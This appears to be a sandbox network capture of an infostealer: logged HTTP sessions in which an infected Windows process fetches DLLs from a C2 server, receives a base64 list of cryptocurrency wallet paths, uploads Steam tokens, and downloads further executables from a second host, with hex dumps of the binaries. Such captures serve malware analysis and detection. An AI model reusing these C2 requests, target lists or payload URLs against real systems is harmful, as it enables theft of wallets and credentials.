Sep 4, 2024 17:37:43.963766098 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:43 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 4, 2024 17:37:45.758626938 CEST	92	OUT	GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 4, 2024 17:37:45.938288927 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:45 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 4, 2024 17:37:47.017841101 CEST	96	OUT	GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Sep 4, 2024 17:37:47.198214054 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:47 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 4, 2024 17:37:47.695017099 CEST	199	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFB Host: 46.8.231.109 Content-Length: 947 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:37:48.085182905 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 4, 2024 17:37:48.194689989 CEST	466	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJ Host: 46.8.231.109 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="message"wallets------AFBFHDBKJEGHJJJKFIIJ--
Sep 4, 2024 17:37:48.378339052 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:48 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 4, 2024 17:37:48.428143024 CEST	464	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCF Host: 46.8.231.109 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 2d 2d 0d 0a Data Ascii: ------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="message"files------CAAKKFHCFIECAAAKEGCF--
Sep 4, 2024 17:37:48.610738039 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 4, 2024 17:37:48.698246956 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGCAAFBFBKFIDGDHJDB Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="file"------HDGCAAFBFBKFIDGDHJDB--
Sep 4, 2024 17:37:48.967339039 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 4, 2024 17:37:49.694847107 CEST	471	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJ Host: 46.8.231.109 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="message"ybncbhylepme------EHJDHJKFIECAAKFIJJKJ--
Sep 4, 2024 17:37:49.934736013 CEST	383	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:49 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 156 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 63 48 4a 76 5a 79 38 32 4e 6d 51 33 4d 44 63 33 4e 57 4d 31 4e 44 68 6b 58 33 59 75 5a 58 68 6c 66 44 42 38 4d 48 78 54 64 47 46 79 64 48 77 30 66 47 68 30 64 48 41 36 4c 79 38 78 4e 44 63 75 4e 44 55 75 4e 44 51 75 4d 54 41 30 4c 33 42 79 62 32 63 76 4e 6a 5a 6b 4e 7a 41 33 4e 32 45 79 4d 44 59 30 5a 46 39 73 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 77 3d Data Ascii: aHR0cDovLzE0Ny40NS40NC4xMDQvcHJvZy82NmQ3MDc3NWM1NDhkX3YuZXhlfDB8MHxTdGFydHw0fGh0dHA6Ly8xNDcuNDUuNDQuMTA0L3Byb2cvNjZkNzA3N2EyMDY0ZF9sLmV4ZXwwfDB8U3RhcnR8NHw=
Sep 4, 2024 17:37:52.738720894 CEST	471	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFC Host: 46.8.231.109 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GCGHCBKFCFBFHIDHDBFC--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	53042	147.45.44.104	80	2800	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:37:50.159953117 CEST	88	OUT	GET /prog/66d70775c548d_v.exe HTTP/1.1 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:50.751509905 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:50 GMT Content-Type: application/octet-stream Content-Length: 290344 Last-Modified: Tue, 03 Sep 2024 12:56:21 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d70775-46e28" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3c 04 00 00 0a 00 00 00 00 00 00 7e 5a 04 00 00 20 00 00 00 60 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 04 00 00 02 00 00 31 48 04 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 5a 04 00 57 00 00 00 00 60 04 00 02 06 00 00 00 00 00 00 00 00 00 00 00 48 04 00 28 26 00 00 00 80 04 00 0c 00 00 00 ec 58 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf<~Z `@ 1H`$ZW`H(&X H.text: < `.rsrc`>@@.relocF@B`ZHL,^3]B3H1^`aVj(X`vK)gAW}*<<L%}x31tr:]a#!Uq1~@X(LjDADwksE&L:iADl;8VPVZo$~:kiholbDBOIvKs"[IOX2$q3faX;(8fj#kggP%<AEb!]UH~0a
Sep 4, 2024 17:37:50.751530886 CEST	1236	IN	Data Raw: 59 b6 7d e0 89 0b 12 21 3e 97 fb ec aa ed 4d fc a3 c6 2f 26 2a e5 4b 27 89 d4 b0 86 d5 07 4e 9f b4 f4 5f bb 43 36 e2 68 8f 20 7a 9b 6a a9 93 87 a6 e9 d7 94 6f d9 db 03 46 35 aa c2 c2 aa 60 b2 21 d9 64 22 70 b3 25 0f 91 56 39 eb 53 08 78 53 b2 82 Data Ascii: Y}!>M/&*K'N_C6h zjoF5`!d"p%V9SxS<j6E9wJbngmBzQxd!(qG+8gB<\HplCO}'F&L<u~PsnGDF][LK(\|KCP
Sep 4, 2024 17:37:50.751543045 CEST	1236	IN	Data Raw: 02 93 46 25 75 e5 59 9e 60 0b 15 6d 5f ad 2c 8a ed 9f a2 86 80 5d 76 93 f4 39 c6 aa ed 36 dd fa ba 9e 89 68 d9 ad be 48 d2 e8 a5 6a 16 91 40 91 e1 9b 44 94 03 7c 7a cf 69 a3 70 6f 70 4e a0 16 39 fa 0a 3d 39 f3 3e 72 f1 b4 bd 48 36 9e 82 68 60 e1 Data Ascii: F%uY`m_,]v96hHj@D\|zipopN9=9>rH6h`\%p'PTa3~sTZLf#cp0[#Z]7IcWw8pf.Aq-x5:3?QUq>~)H+p_p>2R
Sep 4, 2024 17:37:50.751554966 CEST	1236	IN	Data Raw: 65 cf d2 2b f1 03 c9 1c 7b 72 b7 59 5a 44 09 a1 1d 9b 68 4f 07 bc f2 4a 07 19 e2 29 bd 56 b0 ee 71 d9 5a 3a 65 ae 88 98 ff 87 fb 00 50 8f ed f1 cb 90 65 49 d9 4c 27 75 9a 30 81 1c 18 62 a2 5a 39 bb 08 8d 17 15 34 30 1e b7 23 18 17 95 ed 44 8f 64 Data Ascii: e+{rYZDhOJ)VqZ:ePeIL'u0bZ940#Dd+TX=";>(RmJT9-\|yQ`_OzjT>TVF=eAXV["!Z.ciPi N$Qv7/EXS-=5*<a-'L$
Sep 4, 2024 17:37:50.751568079 CEST	896	IN	Data Raw: 04 45 29 94 4b 87 12 21 53 3a 8e 1f 75 ad 62 a4 d8 0f 9e 66 be be 33 59 30 c6 9a d0 a0 e7 0f 64 74 d9 65 3b 0f be 3a 85 b0 a8 22 2d d5 e8 82 d4 df 82 db 81 64 01 36 44 8d a1 ff 1c 1f af 8b 44 3f af 2f 38 69 00 7c 63 38 a6 28 5e e7 62 67 14 51 67 Data Ascii: E)K!S:ubf3Y0dte;:"-d6DD?/8i\|c8(^bgQgJAhu{!`lSTY)W2=$LZIm>qzg9]uyK+"2oIq;ZHu'OnKXG#xV)am"bP0;yu
Sep 4, 2024 17:37:50.751580954 CEST	1236	IN	Data Raw: 19 96 31 74 f8 c0 fe 1f 62 da 34 3d 3b e4 a7 b0 9a aa fb e7 e9 c8 94 e4 c0 da 1c 11 32 e2 f5 e7 87 0d 2b 07 b1 00 1b 16 1f 96 35 40 84 4c 66 da cf 98 88 a8 18 e1 55 c4 7e e3 a6 e4 54 5a 71 44 55 8b 9b b2 2e 3e 93 7e 18 05 c7 c9 24 54 11 06 4a bb Data Ascii: 1tb4=;2+5@LfU~TZqDU.>~$TJ+Y K%y{.RH\|d+*s;g5SMw5_;`I1o@JSLKw"\|wx:d}C%~6K.$6IH
Sep 4, 2024 17:37:50.751599073 CEST	1236	IN	Data Raw: b1 60 6b 54 32 39 f4 95 67 b0 d2 46 81 c9 ec b2 34 69 be ad 21 63 aa 4c 6a a9 a5 8d cc 00 73 c5 e2 7a 7a d6 68 3a 85 94 ae 9c b8 5c 93 3a a8 fd 9c d0 e2 f2 9b 60 28 2c 64 83 66 a1 5f 3a f9 31 89 d1 df ee ad 2d 2a 46 0b a8 b8 86 5f 58 8f 83 2b 0f Data Ascii: `kT29gF4i!cLjszzh:\:`(,df_:1-F_X+;:U3qwU(BXp%b_N7upMR.5R>R96x-MqvJPK$}Z@{SV#JTI6aEO3{
Sep 4, 2024 17:37:50.751610041 CEST	1236	IN	Data Raw: b2 ea 35 99 1f 0e f3 74 cc c7 0b 17 a5 09 34 65 98 4e 6b b5 61 db 6f 32 f9 b9 5d 68 4c 43 70 69 31 0d b1 03 5a ed c6 b3 70 73 76 6a ba 56 9d 15 e5 98 21 81 20 e2 c2 44 d6 94 07 d0 09 9f 15 00 f0 1a 04 14 e9 0c a9 c7 85 b5 37 54 d9 b6 2b 7d 1a 76 Data Ascii: 5t4eNkao2]hLCpi1ZpsvjV! D7T+}v9lYH^?_u:/o\:hTB$w."bneiW\|?LJpjEh\c%Cti_z+#;2A8Hs
